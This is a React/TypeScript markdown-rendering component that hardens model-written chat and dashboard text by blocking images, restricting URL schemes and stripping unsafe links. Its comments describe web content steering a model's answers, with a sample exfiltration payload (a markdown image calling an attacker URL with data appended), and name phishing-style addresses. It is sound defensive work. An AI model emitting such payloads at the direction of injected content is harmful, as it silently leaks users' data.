import { memo } from "react";
import ReactMarkdown, { defaultUrlTransform } from "react-markdown";
import remarkGfm from "remark-gfm";
import { isSafeTextHref } from "@verity/report-components";
import type { Processor } from "unified";
import classes from "./MarkdownContent.module.css";

interface MarkdownContentProps {
  content: string;
  /** One line of inline markdown, drawn inside its parent with no wrapper:
   *  links, strikethrough, bold and italic only (the dashboard heading, plan
   *  2026-10-17-dashboard-text-style-complete, A3). */
  inline?: boolean;
  /** The dashboard's link rule: an http, https or mailto address becomes a
   *  link, anything else (a relative path, `//host`, `/\host`) is drawn as
   *  its label only. The rule reports and emails use (`isSafeTextHref`). An
   *  inline line always follows it. */
  dashboardLinks?: boolean;
}

/* Defense-in-depth for model-written markdown (ADR-0132): with web search
   enabled, chat answers can be steered by untrusted web content. A markdown
   image (`![](https://attacker/x.png?d=...)`) would trigger a zero-click
   outbound fetch on render — images are disallowed outright (no chat flow
   legitimately emits them), and URLs are restricted to http(s)/relative so
   no exotic protocol reaches the DOM. */
const DISALLOWED_ELEMENTS = ["img"];

/* The remark plugins view mode parses with. Exported so the dashboard text
   block's editor judges "does this survive a round trip" with exactly the
   parser that will render it (textBlockEditor/markdown.ts). */
export const MARKDOWN_REMARK_PLUGINS: NonNullable<Parameters<typeof ReactMarkdown>[0]["remarkPlugins"]> = [
  [remarkGfm, { singleTilde: false }],
];

/* The block constructs an inline line does not read: a heading "1. Intro",
   "# x" or "- y" stays the text it is, never a list or a heading. micromark's
   own switch (`disable.null`, by construct name); images, raw HTML, code and
   `<url>` autolinks are off too. A bare web address still becomes a link, as
   in a text block: remark-gfm adds those in a tree transform, not a
   construct, so this switch cannot reach them. */
const INLINE_DISABLED_CONSTRUCTS = [
  "blockQuote", "codeFenced", "codeIndented", "codeText", "definition", "headingAtx", "htmlFlow",
  "htmlText", "labelStartImage", "list", "setextUnderline", "thematicBreak", "hardBreakEscape",
  "table", "gfmFootnoteDefinition", "gfmFootnoteCall", "gfmPotentialFootnoteCall", "autolink",
];

function remarkInlineOnly(this: Processor) {
  const data = this.data();
  (data.micromarkExtensions ??= []).push({ disable: { null: INLINE_DISABLED_CONSTRUCTS } });
}

/* The parser an inline line renders with; exported so the heading editor
   judges a round trip with it (textBlockEditor/markdown.ts). */
export const MARKDOWN_INLINE_REMARK_PLUGINS: NonNullable<Parameters<typeof ReactMarkdown>[0]["remarkPlugins"]> = [
  ...MARKDOWN_REMARK_PLUGINS,
  remarkInlineOnly,
];

/* An inline line keeps these elements; every other one (the paragraph
   itself) is unwrapped to its text. */
const INLINE_ELEMENTS = ["a", "del", "strong", "em"];

const ANCHOR_COMPONENTS = {
  a: ({ node: _node, ...anchorProps }: React.ComponentProps<"a"> & { node?: unknown }) => (
    // External links (web-search citations) open in a new tab and
    // never carry referrer/opener back to the source page.
    <a {...anchorProps} target="_blank" rel="noopener noreferrer nofollow" />
  ),
};

/* A dashboard text, heading or smart text is written by a person or an
   agent and read by everyone the dashboard is shared with, so a link there is
   a phishing surface: a scheme-less address (`//evil.example`, `/\evil`,
   which a browser reads as `//`, or a same-origin `/api/...`) must never
   become an anchor. */
function dashboardUrlTransform(url: string): string {
  return isSafeTextHref(url) ? url : "";
}

/* A link whose address was refused keeps its label and loses the anchor:
   an `<a href="">` would still open this page in a new tab. */
const DASHBOARD_ANCHOR_COMPONENTS = {
  a: ({ node: _node, href, children, ...anchorProps }: React.ComponentProps<"a"> & { node?: unknown }) =>
    href ? (
      <a {...anchorProps} href={href} className={classes.dashboardLink} target="_blank" rel="noopener noreferrer nofollow">
        {children}
      </a>
    ) : (
      <>{children}</>
    ),
};

function safeUrlTransform(url: string): string {
  const transformed = defaultUrlTransform(url);
  if (!transformed) return "";
  const colon = transformed.indexOf(":");
  const firstSlash = transformed.indexOf("/");
  const hasProtocol = colon !== -1 && (firstSlash === -1 || colon < firstSlash);
  if (!hasProtocol) return transformed; // relative URL — safe
  return /^https?:/i.test(transformed) ? transformed : "";
}

function MarkdownContentInner({ content, inline = false, dashboardLinks = false }: MarkdownContentProps) {
  if (inline) {
    return (
      <ReactMarkdown
        remarkPlugins={MARKDOWN_INLINE_REMARK_PLUGINS}
        allowedElements={INLINE_ELEMENTS}
        unwrapDisallowed
        urlTransform={dashboardUrlTransform}
        components={DASHBOARD_ANCHOR_COMPONENTS}
      >
        {content}
      </ReactMarkdown>
    );
  }
  return (
    <div className={classes.markdown}>
      {/* remark-gfm: without it, model-written markdown tables render as a
          single paragraph of raw pipes (single newlines are soft breaks).
          singleTilde off: the model writes "~40%" as "approximately", and two
          of those in one paragraph would render everything between them as
          strikethrough. Only ~~double~~ is intentional strikethrough. */}
      <ReactMarkdown
        remarkPlugins={MARKDOWN_REMARK_PLUGINS}
        disallowedElements={DISALLOWED_ELEMENTS}
        urlTransform={dashboardLinks ? dashboardUrlTransform : safeUrlTransform}
        components={dashboardLinks ? DASHBOARD_ANCHOR_COMPONENTS : ANCHOR_COMPONENTS}
      >
        {content}
      </ReactMarkdown>
    </div>
  );
}

const MarkdownContent = memo(MarkdownContentInner);
MarkdownContent.displayName = "MarkdownContent";

export default MarkdownContent;
